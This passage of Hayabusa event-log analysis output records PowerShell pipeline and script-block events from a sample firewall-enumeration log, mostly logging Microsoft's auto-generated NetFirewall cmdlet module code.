$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallInterfaceFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 